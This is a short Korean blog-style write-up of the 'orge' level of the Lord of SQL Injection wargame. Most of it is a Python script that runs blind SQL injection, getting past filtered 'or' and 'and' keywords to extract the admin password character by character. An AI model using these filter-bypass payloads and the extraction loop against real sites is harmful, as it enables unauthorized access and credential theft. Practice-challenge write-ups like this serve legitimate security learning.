7. LOS - orge

LOS orge입니다 여기서 조금 많이 걸렸습니다.

소스코드를보면 

4번 문제와 아주 유사한다 or하고 and 가 ban먹었습니다. 그래서 이거우회하느라 시간이 많이걸렸고 알수없는 문법오류떄문에 삽질했습니다..ㅎ

tip!!    {

or -> ||

and -> %26%26

 }

아래는 페이로드입니다.

import requests
import string
 
num_alpha = string.digits + string.ascii_letters
password = ""
 
#find length passwd
resetURL = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"
for i in range(1,10) :
    try :
        URL = resetURL
        payload = "?pw=1234' || id ='admin' %26%26 LENGTH(pw)=" + str(i) + "%23"
        URL += payload
    #input your cookie(grin)
        cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")
        response = requests.get(URL, cookies = cookies)
        print("[O] \n" + str(i) + ". connect success!!")
    except :
        print("[X] Error Code...OTL")
    if response.text.find ("</h2>") > 0 :
        print("passwd's length is : " + str(i) + "(grin)")
        break
 
#password LENGTH
for i in range(1, 9) :
    #ord("0") = 48 & ord("Z") = 90
    for j in num_alpha :
        URL = resetURL
        payload = "?pw=1' || id ='admin' %26%26 ASCII(SUBSTR(pw,"+ str(i) +", 1))="+ str(ord(j))+"%23"
        URL += payload
        #input your cookie(grin)
        cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")
        response = requests.get(URL, cookies = cookies)
 
        if response.text.find ("</h2>") > 0 :
            password += chr(ord(j))
            print (str(i) + "'s password is : " + chr(ord(j)))
            break
 
#when you find password? exploit!!
print(password)
URL = resetURL
payload = "?pw=" + password
URL += payload
#input your cookie(grin)
cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")
response = requests.get(URL, cookies = cookies)
print (response.text)